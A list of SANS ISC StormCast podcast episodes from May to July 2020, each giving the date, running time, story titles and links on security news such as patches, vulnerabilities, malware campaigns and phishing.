Compromised Desktop Applications By Web Technologies https://isc.sans.edu/forums/diary/Compromized+Desktop+Applications+by+Web+Technologies/26384/ Cracking Maldoc VBA Project Passwords https://isc.sans.edu/forums/diary/Cracking+Maldoc+VBA+Project+Passwords/26390/ Cisco Patching Treck IP Stack Vulnerabilities https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-treck-ip-stack-JyBQ5GyC Ubiquiti Devices Break Due to Malformed Feed https://community.ui.com/questions/Threat-Management-rules-silently-disabled-for-users-as-of-July-17-2020/35221bd2-843d-41a3-a957-33f57d9a8468
7/27/2020, 5 minutes, 33 seconds

ISC StormCast for Friday, July 24th 2020

Simple Blocklisting with MISP and pfSense https://isc.sans.edu/forums/diary/Simple+Blocklisting+with+MISP+pfSense/26380/ ISC Intel Feed (Beta. DO NOT USE AS BLOCKLIST) https://isc.sans.edu/api/intelfeed?json (also see isc.sans.edu/api ) ASUS RT-AC1900P Router Vulnerability https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=27440 D-Link Leaks Firmware Encryption Key https://nstarke.github.io/0036-decrypting-dlink-proprietary-firmware-images.html Cisco Adaptive Security Appliance Software and Firepower Threat Defense Software Vulnerability https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-ro-path-KJuQhB86
7/24/2020, 6 minutes

ISC StormCast for Thursday, July 23rd 2020

A Few IoCs Related to the F5 Vulnerability CVE-2020-5092 https://isc.sans.edu/forums/diary/A+few+IoCs+related+to+CVE20205092/26378/ PDF Signature Weaknesses https://pdf-insecurity.org/ Sharepoint Vulnerability PoC CVE-2020-1147 https://srcincite.io/blog/2020/07/20/sharepoint-and-pwn-remote-code-execution-against-sharepoint-server-abusing-dataset.html Twilio Compromise https://www.theregister.com/2020/07/21/twilio_sdk_code_injection/
7/23/2020, 6 minutes, 28 seconds

ISC StormCast for Wednesday, July 22nd 2020

Comparing Covid19 Remote Services in Different Countries https://isc.sans.edu/forums/diary/Couple+of+interesting+Covid19+related+stats/26374/ Adobe Patches Photoshop https://helpx.adobe.com/security/products/bridge/apsb20-44.html https://helpx.adobe.com/security/products/photoshop/apsb20-45.html Citrix Workspace App Vulnerability https://www.pentestpartners.com/security-blog/raining-system-shells-with-citrix-workspace-app/ Microsoft Publishes Sysinternals Procmon for Linux https://github.com/microsoft/ProcMon-for-Linux
7/22/2020, 4 minutes, 35 seconds

ISC StormCast for Tuesday, July 21st 2020

Sextortion Follow the Money Wrap-up https://isc.sans.edu/forums/diary/Sextortion+Update+The+Final+Final+Chapter/26334/ "BadPower" USB-C Charger Firmware Weakness (link in Chinese) https://xlab.tencent.com/cn/2020/07/16/badpower/ Zoom Phishing https://blog.checkpoint.com/2020/07/16/fixing-the-zoom-vanity-clause-check-point-and-zoom-collaborate-to-fix-vanity-url-issue/ Microsoft Office TLS 1.x Phaseout https://docs.microsoft.com/en-us/microsoft-365/compliance/prepare-tls-1.2-in-office-365?view=o365-worldwide
7/21/2020, 6 minutes, 11 seconds

ISC StormCast for Monday, July 20th 2020

#SigRed Update https://isc.sans.edu/forums/diary/Hunting+for+SigRed+Exploitation/26362/ Cloudflare Outage https://blog.cloudflare.com/cloudflare-outage-on-july-17-2020/ Exploitation of ZeroShell Routers https://isc.sans.edu/forums/diary/Scanning+Activity+for+ZeroShell+Unauthenticated+Access/26368/ Zone.Identifier: A Couple of Observations https://isc.sans.edu/forums/diary/ZoneIdentifier+A+Coupe+Of+Observations/26366/ Forgotten tcpdump Options https://showmethepackets.com/index.php/2020/07/18/a-few-forgotten-tcpdump-options/
7/20/2020, 5 minutes, 48 seconds

ISC StormCast for Friday, July 17th 2020

Twitter Compromise https://twitter.com/TwitterSupport/status/1283591846464233474?s=20 SIGRed PoC hxxps://github.com/maxpl0it/CVE-2020-1350-DoS Apple Updates https://support.apple.com/en-us/HT201222 SAP PoC Exploit Code Published https://github.com/chipik/SAP_RECON https://us-cert.cisa.gov/ncas/alerts/aa20-195a SANS.edu Student: Aaron Elyard: KITT https://www.sans.org/reading-room/whitepapers/OpenSource/improving-analyst-efficiency-office365-business-email-compromise-investigation-scenarios-implementation-open-source-tools-39655 KITT: https://github.com/intrepidtechie/KITT-O365-Tool
7/17/2020, 13 minutes, 47 seconds

ISC StormCast for Thursday, July 16th 2020

MSFT DNS Server Vulnerability https://isc.sans.edu/forums/diary/PATCH+NOW+SIGRed+CVE20201350+Microsoft+DNS+Server+Vulnerability/26356/ https://www.sans.org/webcasts/about-windows-dns-vulnerability-cve-2020-1350-116120 Outlook Crashes After Patch Tuesday Updates https://www.reddit.com/r/sysadmin/comments/hrq0mn/outlook_immediately_crashing_on_open_after/fy5nnx2/ Oracle Quarterly Critical Patch Update https://www.oracle.com/security-alerts/cpujul2020.html Cisco Backdoors https://tools.cisco.com/security/center/publicationListing.x?product=Cisco&sort=-day_sir&limit=100#~Vulnerabilities
7/16/2020, 5 minutes, 15 seconds

ISC StormCast for Wednesday, July 15th 2020

MSFT Patch Tuesday https://isc.sans.edu/forums/diary/Microsoft+July+2020+Patch+Tuesday+Patch+Now/26350/ Adobe Patches https://helpx.adobe.com/security.html
7/15/2020, 5 minutes, 34 seconds

ISC StormCast for Tuesday, July 14th 2020

Purged VBA Code https://isc.sans.edu/forums/diary/Maldoc+VBA+Purging+Example/26342/ Password Protected VBA Code https://isc.sans.edu/forums/diary/VBA+Project+Passwords/26346/ macOS mount_apfs TCC Bypass https://theevilbit.github.io/posts/cve_2020_9771/
7/14/2020, 6 minutes, 27 seconds

ISC StormCast for Monday, July 13th 2020

Excel Spreadsheet Macro Kicks Off Formbook Infection https://isc.sans.edu/forums/diary/Excel+spreasheet+macro+kicks+off+Formbook+infection/26332/ Zoom Update Fixing Zoom on Windows 7 Vulnerability https://support.zoom.us/hc/en-us/articles/360046081271-New-updates-for-July-10-2020 DigiCert Replaces 50,000 EV Certificates https://knowledge.digicert.com/alerts/DigiCert-ICA-Replacement Microsoft Warns of OAuth Consent Phishing https://www.microsoft.com/security/blog/2020/07/08/protecting-remote-workforce-application-attacks-consent-phishing/
7/13/2020, 6 minutes, 50 seconds

ISC StormCast for Friday, July 10th 2020

Citrix Scanning https://isc.sans.edu/forums/diary/Active+Exploit+Attempts+Targeting+Recent+Citrix+ADC+Vulnerabilities+CTX276688/26330/ https://www.youtube.com/watch?time_continue=6&v=1_D4_9BKHSc&feature=emb_logo Juniper Patches https://kb.juniper.net/InfoCenter/index?page=content&channel=SECURITY_ADVISORIES Google Releases Tsunami Security Scanner https://github.com/google/tsunami-security-scanner SANS.edu Student Billy Wilson: Security Supercomputers with BPF Probes https://www.sans.org/reading-room/whitepapers/detection/securing-soft-underbelly-supercomputer-bpf-probes-39635#__utma=56421037.1361558334.1422039453.1445264258.1445266863.510&__utmb=56421037.17.9.1445268558432&__utmc=56421037&__utmx=-&__utmz=56421037.1444729543.493.57.utmcsr=admin.sans.org|utmccn=%28referral%29|utmcmd=referral|utmcct=/account/madmin/account_manage
7/10/202014 minutes, 16 seconds

ISC StormCast for Thursday, July 9th 2020

Obfuscated Malware
https://isc.sans.edu/forums/diary/If+You+Want+Something+Done+Right+You+Have+To+Do+It+Yourself+Malware+Too/26320/
Palo Alto Networks PAN-OS CVE-2020-2034
https://security.paloaltonetworks.com/CVE-2020-2034
Citrix Vulnerability Details (CVE-2020-8194)
https://dmaasland.github.io/posts/citrix.html
Mozilla Suspending Send Service
https://www.zdnet.com/article/mozilla-suspends-firefox-send-service-while-it-addresses-malware-abuse/
7/9/2020, 6 minutes, 31 seconds

ISC StormCast for Wednesday, July 8th 2020

F5 BIG-IP Wrap-up
https://twitter.com/NCCGroupInfosec/status/1280593966879125504
https://www.sans.org/webcasts/116065
Citrix ADC / Citrix Gateway Patches
https://www.citrix.com/blogs/2020/07/07/citrix-provides-context-on-security-bulletin-ctx276688/
Microsoft Releases Free Memory Analysis Service (Project Freta)
https://www.microsoft.com/en-us/research/blog/toward-trusted-sensing-for-the-cloud-introducing-project-freta/
7/8/2020, 5 minutes, 28 seconds

ISC StormCast for Tuesday, July 7th 2020

More BIG-IP Exploits (CVE-2020-5902)
https://isc.sans.edu/forums/diary/Summary+of+CVE20205902+F5+BIGIP+RCE+Vulnerability+Exploits/26316/
Special F5 BIG-IP Webcast
https://www.sans.org/webcasts/116065
Microsoft Defender ATP Web Content Filtering
https://techcommunity.microsoft.com/t5/microsoft-defender-atp/an-update-on-web-content-filtering/ba-p/1505445
OUCH! Newsletter: Ransomware
https://www.sans.org/security-awareness-training/resources/ransomware
Extended Research Feed: Added Net Systems Research
https://isc.sans.edu/api/threatcategory/research
7/7/2020, 5 minutes, 20 seconds

ISC StormCast for Monday, July 6th 2020

F5 BIG-IP Critical RCE (CVE-2020-5902)
https://support.f5.com/csp/article/K52145254
https://isc.sans.edu/forums/diary/CVE20205902+F5+BIGIP+Exploitation+Attempt/26310/
https://github.com/rapid7/metasploit-framework/pull/13807/commits/0417e88ff24bf05b8874c953bd91600f10186ba4
https://www.ptsecurity.com/ww-en/about/news/f5-fixes-critical-vulnerability-discovered-by-positive-technologies-in-big-ip-application-delivery-controller
Guacamole RDP Gateway Vulnerabilities
https://blog.checkpoint.com/2020/07/02/hole-y-guacamole-fixing-critical-vulnerabilities-in-apaches-popular-remote-desktop-gateway/
Barclays Caught Serving Code from Wayback Machine
https://www.theregister.com/2020/07/03/barclays_bank_javascript_wayback_machine/
7/6/2020, 6 minutes, 15 seconds

ISC StormCast for Thursday, July 2nd 2020

Alina PoS Malware Exfiltrating Data via DNS
https://blog.centurylink.com/alina-point-of-sale-malware-still-lurking-in-dns/
EvilQuest "Ransomware" Update
https://objective-see.com/blog/blog_0x59.html
IBM Cyber Resilient Organization Report
https://www.ibm.com/account/reg/us-en/signup?formid=urx-45839
7/2/2020, 4 minutes, 25 seconds

ISC StormCast for Wednesday, July 1st 2020

Windows 10 / Windows Server 2019 Out-of-Band Patch
https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2020-1425
https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2020-1457
macOS Ransomware Arrives as Fake Little Snitch Software
https://blog.malwarebytes.com/mac/2020/06/new-mac-ransomware-spreading-through-piracy/
VPN Privilege Escalation
https://0xsha.io/posts/zombievpn-breaking-that-internet-security
"Secure DNS" (DNSSEC) Phishing Scam
https://nakedsecurity.sophos.com/2020/06/29/beware-secure-dns-scam-targeting-website-owners-and-bloggers/
7/1/2020, 5 minutes, 54 seconds

ISC StormCast for Tuesday, June 30th 2020

Sysmon 11.10 and ADS Logging
https://isc.sans.edu/forums/diary/Sysmon+and+Alternate+Data+Streams/26292/
Palo Alto Networks PAN-OS SAML Vulnerability (CVE-2020-2021)
https://security.paloaltonetworks.com/CVE-2020-2021
Cisco Telnet (telnetd) Vulnerability
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-telnetd-EFJrEzPx
https://appgateresearch.blogspot.com/2020/02/bravestarr-fedora-31-netkit-telnetd_28.html
6/30/2020, 4 minutes, 35 seconds

ISC StormCast for Monday, June 29th 2020

macOS 11 (Big Sur) Security Changes
https://www.sentinelone.com/blog/macos-big-sur-9-big-surprises-for-enterprise-security/
Certificate Lifetime Limited to 1 Year Starting September
https://chromium.googlesource.com/chromium/src/+/ae4d6809912f8171b23f6aa43c6a4e8e627de784
https://support.apple.com/en-us/HT211025
https://lists.cabforum.org/pipermail/servercert-wg/2020-June/002000.html
6/29/2020, 7 minutes, 7 seconds

ISC StormCast for Friday, June 26th 2020

Recordings of the Tech Tuesday Workshop
https://isc.sans.edu/forums/diary/Tech+Tuesday+Recap+Recordings+Part+2+Installing+the+Honeypot+release/26280/
https://www.youtube.com/channel/UCfbOsqPmWg1H_34hTjKEW2A
Credit Card Skimmers Hide Code in Favicon EXIF Data
https://blog.malwarebytes.com/threat-analysis/2020/06/web-skimmer-hides-within-exif-metadata-exfiltrates-credit-cards-via-image-files/
GeoVision Scanner Vulnerabilities
https://thehackernews.com/2020/06/geovision-scanner-vulnerabilities.html
Docker Images Containing Cryptojacking Malware
https://unit42.paloaltonetworks.com/cryptojacking-docker-images-for-mining-monero/
SANS.edu Student Karim Lalji: Real-Time Honeypot Forensic Investigation of a German Organized Crime Network
https://www.sans.org/reading-room/whitepapers/threathunting/real-time-honeypot-forensic-investigation-german-organized-crime-network-39640
6/26/2020, 16 minutes, 43 seconds

ISC StormCast for Thursday, June 25th 2020

Using Shell Links as Zero-Touch Downloaders and to Initiate Network Connections
https://isc.sans.edu/forums/diary/Using+Shell+Links+as+zerotouch+downloaders+and+to+initiate+network+connections/26276/
Chrome Updates Released
https://chromereleases.googleblog.com/2020/06/stable-channel-update-for-desktop_22.html
QNAP Updates for Helpdesk
https://www.qnap.com/de-de/security-advisory/qsa-20-03
Magento Update
https://helpx.adobe.com/security/products/magento/apsb20-41.html
Attacks Against Microsoft Exchange Servers
https://www.microsoft.com/security/blog/2020/06/24/defending-exchange-servers-under-attack/
6/25/2020, 5 minutes, 49 seconds

ISC StormCast for Wednesday, June 24th 2020

Analysis of Traffic Targeting CyberBunker IP Space
https://isc.sans.edu/forums/diary/Cyberbunker+20+Analysis+of+the+Remnants+of+a+Bullet+Proof+Hosting+Provider/26266/
Microsoft Offering Enterprise Security Products (Defender ATP) for Linux/Android
https://techcommunity.microsoft.com/t5/microsoft-defender-atp/announcing-microsoft-defender-atp-for-android/ba-p/1480787
https://techcommunity.microsoft.com/t5/microsoft-defender-atp/microsoft-defender-atp-for-linux-is-now-generally-available/ba-p/1482344
Microsoft Safe Documents
https://techcommunity.microsoft.com/t5/microsoft-365-blog/safe-documents-is-generally-available/ba-p/1480401
6/24/2020, 5 minutes, 57 seconds

ISC StormCast for Tuesday, June 23rd 2020

Comparing Office Documents with WinMerge
https://isc.sans.edu/forums/diary/Comparing+Office+Documents+with+WinMerge/26268/
VMware Tools and Microsoft Office Updates for macOS
https://www.vmware.com/security/advisories/VMSA-2020-0014.html
https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2020-1225
https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2020-1226
https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2020-1229
Remote Code Execution Vulnerability in Bitdefender
https://palant.info/2020/06/22/exploiting-bitdefender-antivirus-rce-from-any-website/
Google Analytics Used to Exfiltrate Data (CSP Bypass)
https://www.perimeterx.com/tech-blog/2020/bypassing-csp-exflitrate-data/
6/23/2020, 7 minutes, 13 seconds

ISC StormCast for Monday, June 22nd 2020

Sigma Rules! The Generic Signature Format for SIEM Systems
https://isc.sans.edu/forums/diary/Sigma+rules+The+generic+signature+format+for+SIEM+systems/26258/
Pi Zero Honeypot
https://isc.sans.edu/forums/diary/Pi+Zero+HoneyPot/26260/
Ransomware Operators Lurk on Your Network
https://www.bleepingcomputer.com/news/security/ransomware-operators-lurk-on-your-network-after-their-attack/
Discord Modified to Steal Accounts
https://www.bleepingcomputer.com/news/security/discord-modified-to-steal-accounts-by-new-nitrohack-malware/
6/22/2020, 5 minutes, 24 seconds

ISC StormCast for Friday, June 19th 2020

Broken Phishing Accidentally Exploiting Outlook Zero-Day
https://isc.sans.edu/forums/diary/Broken+phishing+accidentally+exploiting+Outlook+zeroday/26254/
Webcast:
https://www.sans.org/webcasts/sansatmic-catch-release-phishing-techniques-good-guys-115430
Cisco Updates for Treck IP Stack Vulnerabilities
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-treck-ip-stack-JyBQ5GyC
All Cisco Advisories:
https://tools.cisco.com/security/center/publicationListing.x
Netgear httpd Firmware Upload Stack-Based Buffer Overflow RCE Vulnerability
https://blog.grimm-co.com/2020/06/soho-device-exploitation.html
Tech Tuesday Workshop:
https://www.sans.org/webcasts/tech-tuesday-workshop-collaborating-scale-contribute-profit-internet-storm-center-115935
6/19/2020, 5 minutes, 56 seconds

ISC StormCast for Thursday, June 18th 2020

Odd Protest Spam (Scam?) Targeting Atlanta Police Foundation
https://isc.sans.edu/forums/diary/Odd+Protest+Spam+Scam+Targeting+Atlanta+Police+Foundation/26248/
Zoom Publishes End-to-End Encryption Whitepaper
https://github.com/zoom/zoom-e2e-whitepaper
Linux ACPI Bug Defeats UEFI Secure Boot
https://git.zx2c4.com/american-unsigned-language/tree/american-unsigned-language-2.sh
Tech Tuesday Workshop:
https://www.sans.org/webcasts/tech-tuesday-workshop-collaborating-scale-contribute-profit-internet-storm-center-115935
6/18/2020, 7 minutes, 4 seconds

ISC StormCast for Wednesday, June 17th 2020

Sextortion to the Next Level
https://isc.sans.edu/forums/diary/Sextortion+to+The+Next+Level/26244/
T-Mobile Outage Due to Configuration Error
https://www.scmagazine.com/home/security-news/outages-draw-speculation-of-ddos-attack-on-u-s-but-reality-likely-more-boring/
Vulnerability Analysis of 2,500 Docker Hub Images
https://arxiv.org/pdf/2006.02932.pdf
Treck IP Stack Contains Multiple Vulnerabilities
https://www.kb.cert.org/vuls/id/257161
6/17/2020, 6 minutes, 39 seconds

ISC StormCast for Tuesday, June 16th 2020

HTML Based Phishing Run
https://isc.sans.edu/forums/diary/HTML+based+Phishing+Run/26242/
Major T-Mobile Outage (may affect other carriers as well)
https://twitter.com/NevilleRay/status/1272650750665953280
https://status.duo.com/incidents/txv7kq6tr0h8
Vulnerabilities in LTE and 5G Networks (GTP)
https://positive-tech.com/storage/articles/gtp-2020/threat-vector-gtp-2020-eng.pdf
SANSFIRE Handler Talks
Xavier Mertens: https://www.sans.org/webcasts/sansatmic-walk-logs-hell-115420
Bojan Zdrnja: https://www.sans.org/webcasts/sansatmic-arcane-web-mobile-application-vulnerabilities-115425
6/16/2020, 6 minutes, 51 seconds

ISC StormCast for Monday, June 15th 2020

Fileless Excel Malware
https://isc.sans.edu/forums/diary/Malicious+Excel+Delivering+Fileless+Payload/26232/
Windows Update Issues
https://support.microsoft.com/en-us/help/4566779/usb-printer-port-missing-after-disconnecting-printer-while-windows-10
https://answers.microsoft.com/en-us/windows/forum/all/cumulative-updates-june-9th-2020/45a8a7f3-cb89-459e-acf1-32d9de15c099
Privnote.com Phishing
https://krebsonsecurity.com/2020/06/privnotes-com-is-phishing-bitcoin-from-users-of-private-messaging-service-privnote-com/
SANS @Mic Talk: ISC Handler Bojan Zdrnja
https://www.sans.org/webcasts/sansatmic-arcane-web-mobile-application-vulnerabilities-115425
6/15/2020, 6 minutes, 16 seconds

ISC StormCast for Friday, June 12th 2020

Anti-Debugging JavaScript Techniques
https://isc.sans.edu/forums/diary/AntiDebugging+JavaScript+Techniques/26228/
Facebook Messenger Desktop App Vulnerability
https://blog.reasonsecurity.com/2020/06/11/persistence-method-using-facebook-messenger-desktop-app/
Outlook Mass-Mailing Macros (Gamaredon)
https://www.welivesecurity.com/2020/06/11/gamaredon-group-grows-its-game/
STI Student Research: Dennis Taggard; Ebb and Flow: Network Flow Logging as a Staple of Public Cloud Visibility or a Waning Imperative?
Paper: https://www.sans.org/reading-room/whitepapers/cloud/ebb-flow-network-flow-logging-staple-public-cloud-visibility-waning-imperative-39580
Video: https://youtu.be/faoFx7Q3_aM
6/12/2020, 7 minutes, 1 second

ISC StormCast for Thursday, June 11th 2020

Job Application Themed Malspam Pushes ZLoader
https://isc.sans.edu/forums/diary/Job+applicationthemed+malspam+pushes+ZLoader/26222/
More Expiring Root CAs
https://scotthelme.co.uk/impending-doom-root-ca-expiring-legacy-clients/
Black Lives Matter Themed Malware (TrickBot)
https://www.bleepingcomputer.com/news/security/fake-black-lives-matter-voting-campaign-spreads-trickbot-malware/
6/11/2020, 6 minutes, 18 seconds

ISC StormCast for Wednesday, June 10th 2020

Microsoft Patch Day (June 2020)
https://isc.sans.edu/forums/diary/Microsoft+June+2020+Patch+Tuesday/26220/
SMBleed (CVE-2020-1206)
https://github.com/ZecOps/CVE-2020-1206-POC
Adobe Patches
https://helpx.adobe.com/security.html
Intel Patch Day
https://blogs.intel.com/technology/2020/06/ipas-security-advisories-for-june-2020/?linkId=100000012832617
6/10/2020, 6 minutes, 9 seconds

ISC StormCast for Tuesday, June 9th 2020

Translating BASE64 Obfuscated Scripts
https://isc.sans.edu/forums/diary/Translating+BASE64+Obfuscated+Scripts/26214/
Fake Ransomware Decryptor Double-Encrypts Victims' Files
https://www.bleepingcomputer.com/news/security/fake-ransomware-decryptor-double-encrypts-desperate-victims-files/
GnuTLS TLS 1.3 Machine-in-the-Middle
https://gitlab.com/gnutls/gnutls/-/issues/1011
CallStranger UPnP Vulnerability
https://callstranger.com/
Shellcode Analysis 101
https://www.sans.org/webcasts/sansatmic-shellcode-analysis-101-114160
6/9/2020, 6 minutes, 51 seconds

ISC StormCast for Monday, June 8th 2020

PHP FastCGI Attacks
https://isc.sans.edu/forums/diary/Not+so+FastCGI/26208/
Cyber Security for Protests
https://isc.sans.edu/forums/diary/Cyber+Security+for+Protests/26210/
uBlock Origin Blocks Port Scans
https://www.bleepingcomputer.com/news/security/ublock-origin-ad-blocker-now-blocks-port-scans-on-most-sites/
QNAP Vulnerability
https://www.qnap.com/en/security-advisory/qsa-20-01
6/8/2020, 6 minutes, 23 seconds

ISC StormCast for Friday, June 5th 2020

Anti-Debugging Technique Based on Memory Protection
https://isc.sans.edu/forums/diary/AntiDebugging+Technique+based+on+Memory+Protection/26200/
Suspending Suspicious Domain Feed / Update to Researcher IP Feed
https://isc.sans.edu/forums/diary/Suspending+Suspicious+Domain+Feed+Update+to+Researcher+IP+Feed/26204/
Bank Transaction Comments Used for Abusive Messages
https://www.theregister.com/2020/06/04/commonwealth_bank_bans_indecent_transaction_descriptions/
Android Security Bulletin
https://source.android.com/security/bulletin/2020-06-01
Android Wallpaper Crash
https://www.androidauthority.com/android-wallpaper-crash-1124577/
STI Research Paper: Janusz Pazgier; Efficacy of UNIX HIDS
https://www.sans.org/reading-room/whitepapers/detection/efficacy-unix-hids-39565
6/5/2020, 13 minutes, 14 seconds

ISC StormCast for Thursday, June 4th 2020

Polish Malspam Pushes ZLoader Malware
https://isc.sans.edu/forums/diary/Polish+malspam+pushes+ZLoader+malware/26196/
Cisco Patches IP-in-IP Flaw
https://securityaffairs.co/wordpress/104192/security/ip-in-ip-flaw-cisco.html
Zoom Fixes Two Critical Flaws
https://blog.talosintelligence.com/2020/06/vuln-spotlight-zoom-code-execution-june-2020.html
Firefox Disables Automatic DNS over HTTPS Selection to Prevent DDoS
https://www.mozilla.org/en-US/firefox/77.0.1/releasenotes/
6/4/2020, 5 minutes, 59 seconds
Episode Artwork

ISC StormCast for Wednesday, June 3rd 2020

Type 2 Stackstrings https://isc.sans.edu/forums/diary/Stackstrings+type+2/26192/ More Details About AddTrust External CA Root Expiration https://www.agwa.name/blog/post/fixing_the_addtrust_root_expiration VMWare Cloud Director Vulnerability and Exploit https://citadelo.com/en/blog/full-infrastructure-takeover-of-vmware-cloud-director-CVE-2020-3956/
6/3/2020, 5 minutes, 34 seconds

ISC StormCast for Tuesday, June 2nd 2020

Apple Patches Unc0ver https://support.apple.com/en-us/HT201222 Office 365 Adds Details About Malicious E-Mail Attachments https://www.microsoft.com/en-us/microsoft-365/roadmap?filters=&searchterms=64570 Impact of Research on Our Data https://isc.sans.edu/forums/diary/The+Impact+of+Researchers+on+Our+Data/26182/
6/2/2020, 7 minutes, 6 seconds

ISC StormCast for Monday, June 1st 2020

Sectigo AddTrust CA Expired https://support.sectigo.com/articles/Knowledge/Sectigo-AddTrust-External-CA-Root-Expiring-May-30-2020 Critical Sign In With Apple Flaw https://bhavukjain.com/blog/2020/05/30/zeroday-signin-with-apple/ DABANGG: Refined Flush Based Cache Attacks https://www.cse.iitk.ac.in/users/biswap/DABANGG.pdf New Website Explaining FIDO https://loginwithfido.com/
6/1/2020, 6 minutes, 15 seconds

ISC StormCast for Friday, May 29th 2020

USBFuzz Finds Numerous USB Flaws https://www.nebelwelt.net/files/20SEC3.pdf Cisco Products Vulnerable to Saltstack Vulnerability https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-salt-2vx545AG Another Nail in the Coffin for SHA-1 https://eprint.iacr.org/2020/014.pdf STI Student: Andy Piazza; Qualifying Threat Actor Assessments https://www.sans.org/reading-room/whitepapers/threatintelligence/paper/39585
5/29/2020, 18 minutes, 43 seconds

ISC StormCast for Thursday, May 28th 2020

Phishing With Google Cloud https://isc.sans.edu/forums/diary/Frankensteins+phishing+using+Google+Cloud+Storage/26174/ Trend Micro AntiVirus Blocked by Microsoft https://billdemirkapi.me/How-to-use-Trend-Micro-Rootkit-Remover-to-Install-a-Rootkit/ Netgear Nighthawk Firmware Update Vulnerability https://iot-lab-fh-ooe.github.io/netgear_update_vulnerability/
5/28/2020, 6 minutes, 49 seconds

ISC StormCast for Wednesday, May 27th 2020

Where is SHA3 https://isc.sans.edu/forums/diary/Seriously+SHA3+where+art+thou/26170/ Apple Updates https://support.apple.com/en-us/HT201222 Google ZDI Releases Details Regarding Unpatched Windows Vulnerabilities https://www.zerodayinitiative.com/advisories/ZDI-20-666/ https://www.zerodayinitiative.com/advisories/ZDI-20-665/ https://www.zerodayinitiative.com/advisories/ZDI-20-663/ https://www.zerodayinitiative.com/advisories/ZDI-20-662/ https://www.zerodayinitiative.com/advisories/ZDI-20-664/ Research into Phish Detection https://medium.com/@curtbraz/these-arent-the-phish-you-re-looking-for-7374c3986af5
5/27/2020, 5 minutes, 59 seconds

ISC StormCast for Tuesday, May 26th 2020

Malicious PowerPoint Add-Ins Deliver Malware https://isc.sans.edu/forums/diary/AgentTesla+Delivered+via+a+Malicious+PowerPoint+AddIn/26162/ Virtual Machine Delivers Malware https://news.sophos.com/en-us/2020/05/21/ragnar-locker-ransomware-deploys-virtual-machine-to-dodge-security/ iOS Patch Analysis https://blog.zecops.com/vulnerabilities/hidden-demons-maildemon-patch-analysis-ios-13-4-5-beta-vs-ios-13-5/ eBay Port Scanning https://www.ghacks.net/2020/05/25/ebay-is-port-scanning-your-system-when-you-load-the-webpage/ iPhone Jailbreak https://thehackernews.com/2020/05/iphone-ios-jailbreak-tools.html SANSFIRE https://isc.sans.edu/sansfire
5/26/2020, 6 minutes, 34 seconds

ISC StormCast for Friday, May 22nd 2020

Malware Triage with FLOSS: API Calls Based Behavior https://isc.sans.edu/forums/diary/Malware+Triage+with+FLOSS+API+Calls+Based+Behavior/26156/ Verizon Breach Report https://enterprise.verizon.com/resources/reports/dbir/ Apple Updates https://support.apple.com/en-us/HT201222 Sophos Firewall Vulnerability Exploit https://news.sophos.com/en-us/2020/05/21/asnarok2/
5/22/2020, 6 minutes, 2 seconds

ISC StormCast for Thursday, May 21st 2020

IcedID Malware Update https://isc.sans.edu/forums/diary/Microsoft+Word+document+with+malicious+macro+pushes+IcedID+Bokbot/26146/ NXNSAttack DNS Amplification https://www.nxnsattack.com/ https://en.blog.nic.cz/2020/05/19/nxnsattack-upgrade-resolvers-to-stop-new-kind-of-random-subdomain-attack/ Adobe Updates https://helpx.adobe.com/security.html
5/21/2020, 5 minutes, 47 seconds

ISC StormCast for Wednesday, May 20th 2020

Spike of Scans for Port 62234 https://isc.sans.edu/forums/diary/What+is+up+on+Port+62234/26144/ Cisco Patches https://tools.cisco.com/security/center/publicationListing.x https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-info-disclose-9eJtycMB Google Chrome 83 Released https://chromereleases.googleblog.com/ QNAP Vulnerability Details Released https://medium.com/bugbountywriteup/qnap-pre-auth-root-rce-affecting-450k-devices-on-the-internet-d55488d28a05 ISC YouTube Channel https://www.youtube.com/channel/UCfbOsqPmWg1H_34hTjKEW2A
5/20/2020, 6 minutes, 32 seconds

ISC StormCast for Tuesday, May 19th 2020

Antivirus & Multiple Detections https://isc.sans.edu/forums/diary/Antivirus+Multiple+Detections/26134/ Office 365 Returning Search Results from Other Organizations https://www.theregister.co.uk/2020/05/18/microsoft_office_365_internal_search_mixup/ MagicPairing Vulnerabilities https://arxiv.org/pdf/2005.07255.pdf BIAS: Bluetooth Impersonation AttackS https://francozappa.github.io/about-bias/
5/19/2020, 6 minutes, 16 seconds

ISC StormCast for Monday, May 18th 2020

OWA Scans https://isc.sans.edu/forums/diary/Scanning+for+Outlook+Web+Access+OWA+Microsoft+Exchange+Control+Panel+ECP/26132/ Edison iOS E-Mail Client Leaks Data https://www.theverge.com/2020/5/16/21260967/edison-mail-update-ios-security-bug COMpfun Malware Uses Status Codes to Communicate https://securelist.com/compfun-http-status-based-trojan/96874/ PAN OS Patches https://securityaffairs.co/wordpress/103265/security/palo-alto-networks-pan-os-flaws.html
5/18/2020, 6 minutes, 19 seconds

ISC StormCast for Friday, May 15th 2020

Rethinking Severity https://isc.sans.edu/forums/diary/Patch+Tuesday+Revisited+CVE20201048+isnt+as+Medium+as+MS+Would+Have+You+Believe/26124/ Top Exploited Vulnerabilities https://www.us-cert.gov/ncas/alerts/aa20-133a Zerodium Drops Payouts For iOS/Safari Exploits https://twitter.com/Zerodium/status/1260541578747064326?s=20 BigIP Edge Client Vulnerability https://support.f5.com/csp/article/K20346072
5/15/2020, 6 minutes, 2 seconds

ISC StormCast for Thursday, May 14th 2020

Malspam with Links to ZIP Archives Pushes Dridex Malware https://isc.sans.edu/forums/diary/Malspam+with+links+to+zip+archives+pushes+Dridex+malware/26116/ Ramsay Cyber Espionage Toolkit https://www.welivesecurity.com/2020/05/13/ramsay-cyberespionage-toolkit-airgapped-networks/ Windows DNS over HTTPS Preview https://techcommunity.microsoft.com/t5/networking-blog/windows-insiders-can-now-test-dns-over-https/ba-p/1381282# ISC Handler Series (SANSFIRE) https://www.sans.org/event/sansfire-2020/bonus-sessions/
5/14/2020, 5 minutes, 58 seconds

ISC StormCast for Wednesday, May 13th 2020

